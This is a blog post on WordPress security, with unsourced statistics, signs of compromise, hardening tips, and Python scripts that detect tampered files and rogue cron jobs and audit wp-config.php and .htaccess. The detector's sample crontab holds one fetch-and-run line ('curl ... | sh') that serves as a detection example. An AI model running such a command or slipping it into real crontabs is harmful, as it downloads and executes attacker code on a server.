Just think for a moment. You are running a successful WordPress blog with high user engagement, traffic and revenue when, one day, your site gets hacked and all hell breaks loose.
That is not a remote possibility: more than 70% of popular WordPress sites are vulnerable in one way or another. Since more than 34% of all websites are powered by WordPress, a correspondingly large share of online attacks is aimed at sites running on WordPress.
That is why the WordPress security infographic below is worth your time if you want to tighten up your website security.
Infographic on WordPress Security

So What Makes WordPress so Vulnerable to Hack Attempts?
- Popularity: WordPress is the most popular content management system (CMS), powering 34% of the web, so it is the target attackers invest in most.
- Updates: WordPress is updated frequently, but only 40% of blogs run the latest version, which leaves already-patched vulnerabilities exploitable on the rest.
- Plugin and Theme Bugs: Thousands of plugins and themes are available for WordPress, and this third-party code brings a multitude of bugs with it, giving hackers a field day.
- Security: Many site owners ignore WordPress security until it is too late.
What are the Primary Reasons for Hacking of WordPress Sites?
- 8% of WordPress hacks are due to vulnerabilities in installed plugins.
- 22% of WordPress hacks are due to weak login passwords such as ‘admin’.
- 29% of WordPress hacks are due to vulnerabilities in installed themes.
- 41% of WordPress hacks are due to vulnerabilities in the hosting platform.
Which raises the question: who the hell is attacking your WordPress site?
There are three main sources of threat to your WordPress site:
- Bots: Automated programs that probe one or many sites at once, typically trying known exploits and default credentials against anything they can reach.
- Hacker: A person who targets one site at a time, deliberately and thoroughly.
- Botnet: A network of compromised computers in different locations, controlled together and used to attack one or many sites simultaneously.
Signs that Your WordPress Site is Hacked
There are certain tell-tale signs that your site has been hacked.
- Sudden Traffic Drop: A sudden, unexplained traffic drop can be the result of a compromise, for example when search engines blacklist the site or injected code redirects visitors elsewhere.
- Malware Injection: Hackers may place malware on your site and inject links that redirect to spam websites.
- Defaced Homepage: A defaced homepage is a sure sign of a hacked WordPress website.
- Unable to Login: If you cannot log in to your WordPress site, or a ‘username does not exist’ message appears on the login page, your account may have been removed or renamed by an attacker.
- Unknown files or scripts: If your WordPress scanner detects files or scripts you did not put there, it may be a sign of a hacked website.
- Slow or unresponsive site: A WordPress site under a Distributed Denial of Service (DDoS) attack will become slow or entirely unresponsive.
- Unable to send or receive emails: If your mail server can no longer send or receive email, it may have been taken over to send spam and blacklisted as a result.
- Unwanted Popups: Hackers may display unwanted popups containing ads to users who visit your site from search results.
- Rogue cron jobs: If your server is running scheduled cron jobs that you did not set up, it could be an indication of a hacked WordPress site.
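Two of the signs above, unknown files and rogue cron jobs, can be checked mechanically by comparing the current state of the server against a known-good baseline. The script below is an added example, not code from the original post or from any scanner plugin: it snapshots SHA-256 hashes of a file tree, re-scans after a simulated tamper, flags PHP dropped into wp-content/uploads (which should only ever hold media), and lists crontab lines that are not in an expected set. The directory tree, file contents, crontab text and the address 198.51.100.7 are all constructed for the demonstration.

```python
"""Detect unknown/modified files and rogue cron entries against a baseline.

Added example, not code from the original post. The file tree, crontab text
and the IP address 198.51.100.7 below are constructed for illustration.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map every file under root (path relative to root, '/' separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_manifests(baseline, current):
    """Paths that are new, modified or missing relative to a trusted baseline."""
    new = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {"new": new, "modified": modified, "missing": missing}


def php_in_uploads(paths):
    """wp-content/uploads should hold media only; PHP there is a classic backdoor drop."""
    return sorted(p for p in paths
                  if p.startswith("wp-content/uploads/")
                  and p.lower().endswith((".php", ".phtml", ".php5")))


def rogue_cron_entries(crontab_text, expected):
    """Crontab lines that are neither blank, comments, nor in the expected set."""
    rogue = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line not in expected:
            rogue.append(line)
    return rogue


def run_demo():
    """Build a small constructed WordPress-like tree, snapshot it, tamper with it, re-scan."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(data)

        write("index.php", "<?php require 'wp-blog-header.php';\n")
        write("wp-includes/functions.php", "<?php // core\n")
        write("wp-content/uploads/2019/05/photo.jpg", "JPEGDATA")
        baseline = hash_tree(root)  # taken while the site is known-good

        # simulated compromise: a PHP file dropped in uploads and a core file altered
        write("wp-content/uploads/2019/05/.cache.php", "<?php /* dropped by attacker */ ?>\n")
        write("wp-includes/functions.php", "<?php // core\n// injected line\n")
        current = hash_tree(root)

        report = compare_manifests(baseline, current)
        report["php_in_uploads"] = php_in_uploads(current)

    # constructed crontab: one legitimate wp-cron entry plus one that was never set up
    expected_cron = {"*/15 * * * * /usr/bin/php /var/www/html/wp-cron.php"}
    crontab = (
        "# m h dom mon dow command\n"
        "*/15 * * * * /usr/bin/php /var/www/html/wp-cron.php\n"
        "* * * * * curl -s http://198.51.100.7/u.sh | sh\n"
    )
    report["rogue_cron"] = rogue_cron_entries(crontab, expected_cron)
    return report


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On a real install the baseline would be taken right after a clean deployment (or built from the checksums WordPress publishes for each core release) and stored off the web server, since an attacker who can write to the site can also rewrite a manifest kept next to it.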
Tips to Secure Your WordPress Site
The above discussion should prompt you to secure your WordPress site using these tips.
- Use a long, strong password consisting of upper and lower case letters, numbers, and special characters, and do not reuse it on any other site.
- Do not use an easily guessed username, and replace the default ‘admin’ account immediately.
- Change the author URL slug so that it does not disclose your real login username to hackers.
- Use two-factor authentication (2FA) for logging in to your WordPress site.
- Restrict web access to sensitive files and folders such as wp-config.php, php.ini, and wp-includes.
- Disable directory browsing so that your directory structure is not listed to visitors.
- Allow only known IP addresses to reach the login page and admin area, which is easy to do if you run a single-author blog.
- Use a security plugin for continuous monitoring and protection of your WordPress site.
- Choose a secure web host that provides free TLS (SSL) certificates, daily backups, and malware scanning and removal.
- Change the database table prefix from the default ‘wp_’. This only adds obscurity: an attacker who achieves SQL injection can still list the table names, so treat it as a minor hurdle rather than a control.
- Update WordPress core, themes and plugins promptly so that publicly known vulnerabilities cannot be used to plant backdoors.
- Disable the built-in theme and plugin file editor so that a compromised administrator account cannot be used to write PHP to disk from the dashboard.
- Protect against DDoS attacks by putting a web application firewall and content delivery network (CDN) such as Cloudflare in front of the site.
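Several of the tips above come down to single settings in wp-config.php and the Apache .htaccess. The script below, added here as an example and not code from the original post, audits both files for the default table prefix, the file-editor flag (the DISALLOW_FILE_EDIT constant WordPress honours), directory listing, web access to wp-config.php, and an IP allow-list on wp-login.php. The weak and hardened sample configurations and the address 203.0.113.10 are constructed for illustration, and the .htaccess checks assume Apache 2.4 `Require` syntax.

```python
"""Audit wp-config.php and .htaccess for the hardening tips above.

Added example, not code from the original post. The sample configuration
texts and the IP address 203.0.113.10 are constructed for illustration.
"""
import re

# ---- constructed sample inputs (not from any real site) --------------------
WEAK_WP_CONFIG = """<?php
define( 'DB_NAME', 'blog' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
"""

HARDENED_WP_CONFIG = """<?php
define( 'DB_NAME', 'blog' );
$table_prefix = 'k7q_';
define( 'DISALLOW_FILE_EDIT', true );  // removes the theme/plugin editor
define( 'WP_DEBUG', false );
"""

WEAK_HTACCESS = """# default WordPress rewrite rules only
RewriteEngine On
RewriteRule . /index.php [L]
"""

HARDENED_HTACCESS = """Options -Indexes
<Files wp-config.php>
    Require all denied
</Files>
<Files wp-login.php>
    Require ip 203.0.113.10
</Files>
RewriteEngine On
RewriteRule . /index.php [L]
"""

DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*([^)]+?)\s*\)\s*;""")
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"]([^'"]*)['"]\s*;""")


def parse_defines(config_text):
    """Return {CONSTANT: raw value} for every define() call in wp-config.php."""
    return {name: value.strip() for name, value in DEFINE_RE.findall(config_text)}


def audit_wp_config(config_text):
    """Findings for the table prefix and the dashboard file-editor setting."""
    findings = []
    match = PREFIX_RE.search(config_text)
    if match is None:
        findings.append("no $table_prefix assignment found")
    elif match.group(1) == "wp_":
        findings.append("table prefix is the default 'wp_'")
    editor = parse_defines(config_text).get("DISALLOW_FILE_EDIT", "false")
    if editor.strip("'\"").lower() != "true":
        findings.append("DISALLOW_FILE_EDIT is not true (dashboard file editor enabled)")
    return findings


def _files_block(htaccess_text, filename):
    """Body of the <Files filename> ... </Files> block, or None if absent."""
    pattern = re.compile(r'<Files\s+"?%s"?\s*>(.*?)</Files>' % re.escape(filename),
                         re.S | re.I)
    match = pattern.search(htaccess_text)
    return match.group(1) if match else None


def audit_htaccess(htaccess_text):
    """Findings for directory listing, wp-config.php exposure and login IP restriction.

    Assumes Apache 2.4 'Require' directives; 2.2-style Allow/Deny is not recognised.
    """
    findings = []
    if not re.search(r"^\s*Options\b.*-Indexes", htaccess_text, re.M):
        findings.append("directory listing not disabled (no 'Options -Indexes')")
    block = _files_block(htaccess_text, "wp-config.php")
    if block is None or not re.search(r"Require\s+all\s+denied", block, re.I):
        findings.append("wp-config.php is not blocked from web access")
    block = _files_block(htaccess_text, "wp-login.php")
    if block is None or not re.search(r"Require\s+ip\s+\S+", block, re.I):
        findings.append("wp-login.php is not restricted to known IP addresses")
    return findings


def audit_site(config_text, htaccess_text):
    """Combined findings; an empty list means every checked tip is in place."""
    return audit_wp_config(config_text) + audit_htaccess(htaccess_text)


if __name__ == "__main__":
    for label, cfg, hta in (("weak", WEAK_WP_CONFIG, WEAK_HTACCESS),
                            ("hardened", HARDENED_WP_CONFIG, HARDENED_HTACCESS)):
        print(f"{label}: {audit_site(cfg, hta) or 'no findings'}")
```

To run it against a live install, read the two files from the WordPress root and pass their contents to audit_site(). The hardened .htaccess fragment is itself the fix for three of the tips; note that an IP allow-list on wp-login.php only helps if your own address is static, and that on nginx the equivalent rules live in the server block rather than in .htaccess.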
If you found the infographic on WordPress security and the information presented on this page useful, please let me know by leaving a comment below and sharing this post on your social profiles.
Thank you for adding our website as a reference. You can also include our free security scan plugin from WordPress: https://wordpress.org/plugins/website-security-check/
Best, John
Hello John,
Thanks for letting me know about your plugin. I have included it in the post on WordPress vulnerability scanners.